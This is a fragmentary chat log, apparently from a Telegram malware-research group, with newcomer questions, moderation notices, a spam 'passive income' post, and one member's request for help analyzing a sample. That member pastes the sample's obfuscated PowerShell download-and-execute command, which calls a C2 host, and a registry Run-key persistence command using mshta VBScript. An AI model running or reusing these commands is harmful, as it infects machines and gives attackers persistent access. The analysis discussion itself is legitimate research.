Group for Malware Analysts. Pinned message with resources and rules: https://t.me/MalwareResearch/38033
"I was able to analyze the part where it downloads and compiles C# code, but I couldn't manage the part after that."
Can't get the things which the C# wants to download from the C2
But that's just the beginning. After understanding it, what it is that you want to do with the information is the next question...
You can research into a lot of things, but that path should lead to something that you want?
Give this a shot, also try to just straight up 7z the pe.
Hi Researcher, can I unpack malware which uses exe4j to pack itself?
As a platform I would suggest Google, as a roadmap I suggest the pinned message, for exploits or data leaks I suggest getting employed by the NSA
I just want to say I'm really enjoying being part of your investment platform, passive income every week
/channel/+9lrfRO1a5lVjZDQ0
User onionMan has 1/3 warnings; be careful!
Reason:
check @dfirjobs instead
Hello @Bogi05, welcome to the Malware Research group! Please read the pinned message before you post!
Sam:
It all starts with these commands
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (&NeW-oBjeCt NEt.webClIeNT).doWnLoaDstRInG('[httP://]sToRKa.sTORe/Ps/06fCC253-fD2C-5a52-6f46-a0B42e64251c')|CMd
Command line: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "_06fcc253fd2c5a526f46a0b42e64251c" /t REG_SZ /F /D "mShta VbscRiPt:closE(execUTe(\"cr\"+\"eAt\"+\"eO\"+\"Bj\"+\"ect\"+\"(\"\"\"+\"WS\"+\"CRI\"+\"pt\"+\".Sh\"+\"ELl\"+\"\"\").\"+\"Run\"+\" \"\"\"+\"%_\"+\"06\"+\"FC\"+\"C25\"+\"3F\"+\"D2\"+\"C5\"+\"a5\"+\"26\"+\"F4\"+\"6a\"+\"0B4\"+\"2e\"+\"642\"+\"51c\"+\"%\"\",\"+\"0\"))"
I still don't get where the question is leading to
So you want a sample? Or know what kind of malware exhibits this behaviour? Or if you can detect such behaviour?
It all starts with one script; it connects to the C2 server, gets PowerShell scripts, then runs them, then downloads another C# code and compiles it, then the C# code starts downloading another tool. I need to research this malware.
I think if you input that into Google, you are going to get tons of definitions and common execution methods
No... I don't understand, and Google isn't helping
Hello @nguyen_duyhung, welcome to the Malware Research group! Please read the pinned message before you post!
New FedBan
Fed: Libra's Empire
FedAdmin: ❤🦦
User: Александр
User ID: 1351806164
Reason: scam
Hello everyone, can someone tell me how to build a strong basis in malware? Which platforms should I use to research, and what should my roadmap be? Also, in which channels can I get exploits or immediate data leak news?
Hi guys, I am new here so I just wanted to introduce myself 😊
Yes, but I don't have an enterprise and not enough information to write Sigma rules. Thanks.